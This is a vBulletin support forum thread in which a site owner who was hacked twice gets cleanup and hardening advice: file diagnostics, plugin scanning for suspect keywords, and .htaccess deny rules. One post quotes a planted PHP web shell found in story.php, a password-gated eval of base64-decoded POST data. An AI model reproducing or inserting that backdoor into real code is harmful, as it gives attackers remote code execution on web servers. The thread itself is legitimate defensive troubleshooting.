No announcement yet.

Hacked twice in 3 days. need some help

  • Filter
  • Time
  • Show
Clear All
new posts

  • Hacked twice in 3 days. need some help

    I have been hacked twice in three days. I have deleted my install folder and am running spam bot stopper and spam o matic.

    both hacks just kept the forum form loading with the most recent showing the following on page load

    Fatal error: Cannot redeclare ty() (previously declared in /data/17/2/36/88/2851740/user/3136152/htdocs/forum/activity.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in/data/17/2/36/88/2851740/user/3136152/htdocs/forum/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1

    not sure how they are getting in to alter the php pages.

    Any help would be greatly appreciated.

    Thanks in Advance.


  • #2
    Have you contacted your host about this and also had the host help you file out how they are modifying your files? When you were hacked previously, have you gone through and removed any plugins the hackers installed? or removed any files they may have uploaded? Have you gone though the following steps?

    There are four steps to securing your site. If you don't do them all or you do them in the wrong order than you're still susceptible to being attacked again.

    Close the hole...
    This has three subparts in this instance.
    1. Delete your install folder
    2. Review your admin users and delete any that don't belong. Don't ban them. Don't make them regular users. Delete them.
    3. Close access to your AdminCP using .htaccess. Use either user authorization with a different username and password or IP address restrictions.

    Fill the Hole...
    There are seven subparts in this instance.
    1. Review your files for changes. You can do this under Maintenance -> Diagnostics.
    2. Delete any Suspect Files.
    3. Replace any files marked as "Does not contain expected contents"
    4. Scan your plugins for malicious code (exec, base64, system, pass_thru, iframe are all suspect keywords). Delete any you find.
    5. Repair any templates. Any templates that you don't have notes on changing, you need to revert. If you're using a custom style, it is best to delete your existing style and reimport from a fresh download.
    6. Update your Addon Products.
    7. Rebuild your datastores. You can use tools.php in the "do not upload" folder to do this. Upload it to your admincp directory, delete when done.

    Secure the Hole
    Parts of this were done by closing the hole but there are still things to do here.
    1. Keep notes of all changes you make to the system - what templates and phrases you change, what files belong to which addons, what plugins do the addons install.
    2. Consider using a separate Super Admin who has access to admin logs in the AdminCP. There should be only one Super Admin.
    3. Create a lower permission Administrator for every day use.
    4. Review your permissions in the system.
    5. Block off access to the includes, modcp, packages and vb folders via .htaccess. Deny All can work here, unless you use the ModCP. You need user authorization there.
    6. Move your attachments outside the forum root directory.
    7. Create a complete backup of your site. Make database backups weekly.

    You need to keep active on the security of the site.
    1. Give out the fewest permissions necessary for anyone to do their job
    2. Make sure your hosting provider updates the software.
    3. Update to the latest vBulletin when it is released.
    4. Make sure your addons are always up to date.

    Please don't PM or VM me for support - I only help out in the threads.
    vBulletin Manual & vBulletin 4.0 Code Documentation (API)
    Want help modifying your vbulletin forum? Head on over to
    If I post CSS and you don't know where it goes, throw it into the additional.css template.

    W3Schools <- awesome site for html/css help


    • #3
      unfortunately my host company has not been easy to work with regarding getting server logs. pretty frustrating.

      I have checked for extra admins and plugins.

      i have noticed that there are 3 files in the root dir that vbulletin is not recognizing.


      when i look at the server.php file it has the following
      echo dirname(__FILE__);

      the story.php file has the following
      if(@md5($_POST["gif"]) === "320648220d6bd8b8e51ec3b6d6dd8898") {
      eval (base64_decode($_POST["php"]));

      Are these 2 files part of VBulletin?


      • #4
        No, if a file is not in the upload folder, it shouldn't be in your directory.


        • #5
          Be sure you check the folders mentioned here as well for bad php files, they are not part of the "Suspect file" scan tool -

          It also advises use of an htaccess file to secure these directories which is a good idea.


          • #6
            I am not very familiar with htaccess files. any guidance would be appreciated.

            Thanks for all of the help.


            • #7
              An .htaccess file is simply a text file that contains instructions read by the web server. An .htaccess file affects the folder it is in and any sub-folders of that folder.

              You can create an .htaccess file with a free text editor tool like Notepad2 or Notepad++ both which can be found on Google and are free on Windows.

              The link I linked to has the text you can put into these files, then simply upload them to the directories mentioned.

              .htaccess files work with apache web server which is the majority of web servers- however if your server is not apache then the .htaccess file will likely not work.


              • #8
                thanks so basically i need the following in the htaccess file correct?

                <FilesMatch ".(php|php3|php4|php5|phps)$"> Order Allow,Deny Deny from all </FilesMatch>


                • #9
                  If you look at the info at the top of this page (in yellow) that is all you need to deny all access to folders. (although it says for the install you can put it in any folder that you or your users do not or should not access via a browser).


                  • #10
                    I deleted my install folder. Isn't what I posted above the same thing? I out this in my root dir. Ease forgive my ignorance I am new to this. Thanks


                    • #11
                      Check your plugins as stated in the first reply. Make sure there are no plugins assigned to the vBulletin Product that you didn't write yourself. You want to be looking at the Plugin Manager screen, not the Manage Products screen.
                      Translations provided by Google.

                      Wayne Luke
                      The Rabid Badger - a vBulletin Cloud demonstration site.
                      vBulletin 5 API


                      • #12
                        Originally posted by thebear8me View Post
                        thanks so basically i need the following in the htaccess file correct?

                        <FilesMatch ".(php|php3|php4|php5|phps)$"> Order Allow,Deny Deny from all </FilesMatch>
                        Not sure why the linebreaks went missing but basically yes-

                        <FilesMatch ".(php|php3|php4|php5|phps)$">
                         Order Allow,Deny
                         Deny from all
                        should be in the .htaccess file


                        • #13
                          I have exactly the same problem. But I have been hacked more than 7 times the last month. I changed passwords each time, I deleted suspicious files each time, I deleted ALL ftp content and I uploaded a clean vB each time.
                          ​I disabled plugings, even I cried! Nothing works.

                          I have never been hacked before this new upgrade. It's frustrating


                          • #14
                            You did everything in post 2?


                            • #15
                              Yes, I did. As I know nothing about programing, I looked for help and a programer tried to help me. He did everything he knows to protect my forum. Even changed the path of admincp and modcp.
                              Yesterday, hackers full filled my hard disk space trying to access (error_log: 464 Mb) till they got it

                              I see that this is not just a problem of mine, there are many people with the same problem and that calms me, it was making me paranoid

                              Yesterday I protected my image directory with .htaccess files, let's see what happens now. My host is helping me as far as he can, he told me to ask you what to add to mod_security to protect me more

                              Besides that, I have another strange problem


                              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.